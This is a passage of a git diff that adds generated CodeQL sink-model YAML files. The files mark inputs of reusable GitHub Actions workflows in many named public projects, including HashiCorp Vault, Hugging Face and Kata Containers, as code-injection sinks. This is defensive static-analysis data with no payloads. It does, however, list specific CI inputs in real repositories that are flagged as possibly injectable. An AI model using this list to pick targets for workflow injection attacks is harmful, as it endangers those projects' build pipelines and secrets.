["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml new file mode 100644 index 000000000000..3129cac8979c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "inputs.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.providerFqn", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml new file mode 100644 index 000000000000..a23f69909c7e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "inputs.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml new file mode 100644 index 000000000000..cd91f58c7ec7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml new file mode 100644 index 000000000000..f9b7785cab96 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-version", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml new file mode 100644 index 000000000000..ad0943c30408 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "inputs.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml new file mode 100644 index 000000000000..e263590260ff --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml new file mode 100644 index 000000000000..00b45b50f887 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml new file mode 100644 index 000000000000..a5f35f3b7379 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml new file mode 100644 index 000000000000..d05595196275 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.commit_sha", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml new file mode 100644 index 000000000000..ec7b51abd8e3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml new file mode 100644 index 000000000000..92fd43bda752 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml new file mode 100644 index 000000000000..ca550e4ddd76 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "inputs.kafka-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml new file mode 100644 index 000000000000..580ac8bef0b5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "inputs.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml new file mode 100644 index 000000000000..463536e9693d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml new file mode 100644 index 000000000000..57bf30dc0cc1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "inputs.release-script-to-run", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml new file mode 100644 index 000000000000..b7e49d46e1c0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "inputs.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml new file mode 100644 index 000000000000..89257a02fcd2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "inputs._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml new file mode 100644 index 000000000000..a645511766be --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml new file mode 100644 index 000000000000..1a7784c9f018 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "inputs.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml new file mode 100644 index 000000000000..ffb7a7d7d107 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml new file mode 100644 index 000000000000..4ae93a83cd8f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml 
@@ -0,0 +1,23 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - 
["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml new file mode 100644 index 000000000000..a63ddd5da671 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml new file mode 100644 index 000000000000..e73d0d81875b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml 
@@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.registry", "code-injection", 
"generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml new file mode 100644 index 000000000000..3a9119898744 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.images_tag", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "inputs.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml new file mode 100644 index 000000000000..3c525970eccd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml new file mode 100644 index 000000000000..187b3d2fd0a7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "inputs.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml new file mode 100644 index 000000000000..3e11359c6b36 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "inputs.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml new file mode 100644 index 000000000000..50bbdaf8153d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml new file mode 100644 index 000000000000..9f30976bbadc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "inputs.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "inputs.matrix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml new file mode 100644 index 000000000000..81a419fec0d8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml new file mode 100644 index 000000000000..35fd748afbee --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file 
